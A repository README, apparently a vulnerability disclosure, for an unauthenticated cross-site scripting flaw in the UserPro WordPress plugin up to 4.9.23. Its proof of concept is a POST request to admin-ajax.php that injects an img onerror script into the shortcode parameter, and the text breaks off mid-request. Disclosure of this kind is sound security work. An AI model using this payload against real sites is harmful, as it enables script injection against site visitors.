.. | |||
README.md | Loading last commit info... |
README.md
UserPro <= 4.9.23 - Unauthenticated Cross-Site Scripting (XSS)
Description
An XSS vulnerability that affects from version 2.13 to 4.9.23.
Proof of Concept
POST /wp-admin/admin-ajax.php
Host: domain.com
action=userpro_shortcode_template&shortcode=[userpro<img src=a onerror=alert(1)> id=1 layout="float" collage_per_page="20" emd_paginate_top="1" emd_paginate="1" emd_gender="Gender,radi